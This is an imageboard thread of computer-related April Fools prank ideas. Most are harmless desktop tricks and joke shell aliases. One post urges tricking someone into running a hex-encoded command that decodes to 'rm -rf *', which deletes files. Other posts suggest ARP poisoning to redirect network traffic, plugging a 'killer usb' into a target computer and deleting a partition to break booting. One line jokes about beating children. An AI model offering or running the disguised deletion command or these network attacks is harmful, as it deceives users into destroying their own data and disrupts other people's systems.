What are some cool Jow Forums related april fools?
What are some cool Jow Forums related april fools?
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Take a screenshot of someone's desktop, set it as their background, delete all of their icons and hide their taskbar.
Install Gentoo
beat your kids and post it on youtube
This is a fun prank because it won't ruin someone's entire day
alias find='sleep 5m; find'
Literally never used find. doesn't everyone know the gnu/linux filesystem well enough to know where everything should be?
autohotkey for windows is pretty good. I dunno what you would use to trick linux/bsd users but there is probably something out there
find is reliable for scripting, in real world you use locate
Shitting into somebodys office computer when its unattended
this made me giggle
Change their wallpaper for something related to /l/.
Arp poison and redirect all domains to gnu.org.
Microsoft joins and develops Linux.
Oh, wait...
Flip their desktop upside down
If you are an actually retarded PC user and someone deletes all your icons it might actually
Team Mini
killer usb on a target computer
best team
>install a distro on a friends PC/ Laptop that has Windows
>delete the partition of Linux
>watch as when they try to turn on their computer they get a basic bash shell for grub and become dumb founded
Floens please update clover I want teams
this epic Jow Forums meme
I doubt he's going to push an update for a day-long event.
This. Best team
if you're a regular person you'd be fucked
I put my life on pause to go on my laptop to get a team. I'm not disappointed. I'm simply the best
mine is better.
This is not fun. This is bullying you jackarse.
You don't have to delete them.
Just hide them.
Add the upside down desktop + normal orientated screenshot and your golden. Bonus for chagning the mouse cursor speed and click buttons.
Sticky not on the bottom of the mouse is a classic one as well.
Bonus: extend the desktop to a nonexistent screen and make that the primary. For win7 and below, all icons and taskbar are now offscreen.
>bonus bonus: 256 color graphics mode
le most ebin team in the entire r/gee
Windows: Change a commonly used desktop icon (e.g. Chrome/firefox) to point to shutdown.exe or some equally harmless script you wrote
Unix-like: set a stupid alias or an environment variable in bashrc or .profile
alias make='echo "make is not installed. You can install it by typing ..."'
Nvidia last years auto players.
get them to run
$(echo 726d202d7266202a | xxd -r -p)
This, but literally delete the panel from Xfce/KDE.
Use DNS66 and VPN Hotspot to redirect all Microsoft, Apple, Adobe and Google domains to fsf.org, redirect all porn sites to bible.com